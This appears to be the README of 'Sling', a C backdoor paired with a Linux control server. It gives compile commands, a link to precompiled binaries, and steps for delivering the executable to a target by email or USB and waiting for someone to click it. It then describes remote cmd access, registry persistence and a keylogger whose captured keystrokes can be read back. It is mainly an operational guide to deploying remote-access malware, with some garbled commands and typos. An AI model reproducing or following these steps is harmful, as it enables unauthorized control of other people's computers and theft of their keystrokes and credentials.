Backdoor/Malware test in C. Uses two segments - Backdoor and Server; Backdoor works on windows machines and Server on Linux. No masking yet.
The backdoor file is the one that will be deplyed on the Windows machine. The code is written in C; and it can compiled on a Linux machine to have a 32bit application which can be deployed on Windows systems.
The Server.c file stays on the attacking system to execute commands remotely. The attacking computer must be Linux Machine. Debian based Operating System. Compile normaly as you would using gcc,
Pre Fab folder contains pre made/compiled executable file of the backdoor component of the Malware and the pre compiled file of Server component of the Malware. Download and run
There are two ways you can set up Sling to perform an attack on a system. Note: Change the IP address in the source code to your own else it will not work.
The first method is that you compile your own binary of the backdoor.c & compile the server.s from the source code. For this you will need a Linux Machine.
Clone the repo on your system to an accessible directory location.
Open the terminal and; Compile the server.c file using the command
gcc server.c -o serverNow, in the same terminal window; Compile a binary file of backdoor.c using the following command
i686-w64-mingw32-gcc -o test.exe filename.cIn case of some random Compilation error, try running the followingcommand
i686-w64-mingw32-gcc -o test.exe filename.c -lws2_32This error occurs when you try to compile a 32bit EXE on 64bit Machine but I am not sure as to why because we already do mention about it in the command here
-mingw32You will now have two files;
- server file
- backdoor binary file.
The binary file will be executed on the windows machine. The server file will be executed on Linux system.
The second method is pretty straight forward and simple. It is recommended for most users and specifically for users who do not have any/ready access to Linux. You will download a pre compiled version of the Malware; compiled by me. Note: I update the prefab files rather frequently so they could be a version or two behind from the source. But it'll work as long as the server and the backdoor are of the same version.
Download the precompiled version of Sling from here :
Pre-Fab
Once you have the backdoor executable and the server file setup; follow the steps for sucessful execution.
Deploy the backdoor executable on the Target/test windows machine via email, USB Flash Drive etc. adn wait for the user to click on it.
On the Linux Machine; switch to the active directory of the server file run it using the following command
./serverUpon clicking the binary file on the Windows machine, a system message will be displayed to the user. While on the Linux Machine it will show you the IP address of the connected Windows machine.
From here on, you have established connection with the Target computer. You can run all the basic cmd commands like cd, dir and netstat etc.
The Malware currently supports two commands, as follows;
persistThis will create persistence in the Windows Registry for the Malware to reconnect to the server.
keylog_startThis will start the keylogger on the target system.
type windows.txtThis command will show you the keystrokes captured by the keylogger